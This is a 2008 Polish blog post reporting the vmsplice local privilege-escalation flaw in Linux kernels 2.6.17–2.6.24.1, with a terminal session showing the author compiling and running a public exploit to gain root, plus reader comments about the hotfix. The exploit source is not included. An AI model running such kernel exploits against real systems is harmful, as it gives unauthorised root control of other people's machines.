English version

Marcin Sochacki (Wanted) Blog, Internet, Technologia

» Oh, fsck! Exploit na Linuksa

Właśnie pojawił się nowy lokalny exploit na roota, działający w kernelach 2.6.17 – 2.6.24.1. Dawno już nie było chyba takiego babola, który dotknąłby tyle wersji kernela naraz. Działa na pewno w obecnych wersjach Ubuntu, Debiana, Fedory i pewnie wielu innych. No to czeka nas rundka paczowania, motyla noga! Dziura dotyczy funkcji vmsplice(), której wsparcie zresztą można wyłączyć na etapie kompilacji.

Na szczęście jest już szybka poprawka działająca na żywym systemie (nie wymaga reinstalowania jądra).

Exploit w działaniu:

wanted@fafik: /crack/local-root-exp$ gcc exp.c -static -Wno-format
wanted@fafik: /crack/local-root-exp$ ./a.out
———————————–
 Linux vmsplice Local Root Exploit
 By qaaz
———————————–
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7ede000 .. 0xb7f10000
[+] root
root@fafik: /crack/local-root-exp# id
uid=0(root) gid=0(root)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),106(lpadmin),107(admin),1000(wanted)

2008/02/11 01:44 | komputery/linux/

» Komentarze

Słyszałem że ta poprawka (a może nie ta, tylko inna?) najpierw próbuje uruchomić exploita, żeby sprawdzić czy ma łatać jądro. Uruchomienie exploita, jeżeli było udane, powoduje „korupcję” pamięci w jakimś przypadkowym miejscu. Po uruchomieniu poprawki masz więc jądro, które już nie jest wrażliwe na exploita, ale gdzieś, w którymś miejscu pamięci są śmieci, co się może objawić w nieprzewidywalny sposób...

Automaciej | 2008/02/12 01:14


@Automaciej:
Ano prawda, dlatego niektórzy raportowali że im to zwiesza maszynę. Niemniej, są już oficjalne poprawki, tylko zainstalować i niestety rebootować :)

Wanted | 2008/02/12 01:28


Ale wielka afera sie z tego robi...

lidia | 2008/02/16 13:13










Mój blog

Działy

/ (82)
  info/ (5)
  komputery/ (51)
    apple/ (1)
    google/ (15)
    inne/ (4)
    linux/ (3)
    microsoft/ (10)
    spam/ (1)
    wikipedia/ (6)
    www/ (11)
  media/ (5)
    reklama/ (5)
  miejsca/ (5)
    aconcagua/ (1)
    dublin/ (2)
    trojmiasto/ (2)
  to_lubie/ (16)
    film/ (6)
    foto/ (3)
    humor/ (1)
    sport/ (6)

Archiwa


Odnośniki


Strefa bez kolorów

Ta strona jest zgodna z zasadami Łeb 2.0™!